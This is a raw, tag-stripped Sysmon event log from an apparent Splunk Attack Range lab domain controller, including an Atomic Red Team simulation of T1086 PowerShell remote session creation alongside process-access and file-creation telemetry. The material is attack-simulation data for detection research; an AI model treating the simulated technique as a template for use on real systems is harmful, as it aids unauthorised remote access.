22:55:41.740{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-70ED-603D-7588-00000000AD01}2576C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697503Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.693{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\kerberos.DLL+8cb5a|C:\Windows\system32\kerberos.DLL+42a18|C:\Windows\system32\kerberos.DLL+40fbb|C:\Windows\system32\kerberos.DLL+148cf|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x80000000000000001697502Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.693{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001697501Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.615{05ADC7E1-229F-6039-1600-00000000AD01}15407628C:\Windows\system32\svchost.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697500Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.615{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001697499Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.599{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CDA9883E4FD72B01471C319833F74827,SHA256=9FF65269AE02AEE98CD8B3C15A83DE8D833360536E54ED456B63C1F808073E86,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697498Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.574{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697497Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.574{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001697496Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-01 22:55:41.536{05ADC7E1-70ED-603D-7488-00000000AD01}5596\PSHost.132591129414543883.5596.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001697495Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.536{05ADC7E1-70ED-603D-7488-00000000AD01}5596ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_5lpcmhhk.jdp.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697494Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.521{05ADC7E1-70ED-603D-7488-00000000AD01}5596ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_330cpjtn.f2a.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001697493Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.505{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_330cpjtn.f2a.ps12021-03-01 22:55:41.505 10341000x80000000000000001697492Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.490{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697491Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.463{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697490Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.443{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829C38813) 10341000x80000000000000001697489Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.443{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697488Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.443{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697487Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.443{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697486Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.443{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697485Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.443{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697484Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.443{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc75e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbec214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+706a5407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbb4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc12edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbe8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc214e6(wow64) 154100x80000000000000001697483Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.454{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {New-PSSession -ComputerName $env:COMPUTERNAME Test-Connection $env:COMPUTERNAME Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value \""T1086 PowerShell Session Creation and Use\"" Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000001697482Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.443{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-01 22:53:21.483 11241100x80000000000000001697481Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.443{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-01 22:53:21.480 23542300x80000000000000001697480Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.411{05ADC7E1-7049-603D-4188-00000000AD01}5784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=4D48B91ADC76AA5778194D3F456D20A7,SHA256=9A4F72D042F64B48B784A38F1487D5210D9C2931782102FD07689DEF5BD14FF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697479Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.374{05ADC7E1-70ED-603D-7388-00000000AD01}7268ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697478Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.373{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=00E3A42C14D0FEFEF6B11D667EFE4F52,SHA256=46BA859B7FB1ADA3619DF6BF1BAAD888DF72D6FEF4E5471F1FABF39CBD457959,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697477Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.373{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9A0E54F8CA074952B7F8DE0017112AF,SHA256=AFABEE737E2402551CD55B9F3C5B0419C0BA524C9FA07AAAE9906D4984472918,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697476Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.224{05ADC7E1-229F-6039-1600-00000000AD01}15407628C:\Windows\system32\svchost.exe{05ADC7E1-70ED-603D-7388-00000000AD01}7268C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697475Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.224{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-70ED-603D-7388-00000000AD01}7268C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697474Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 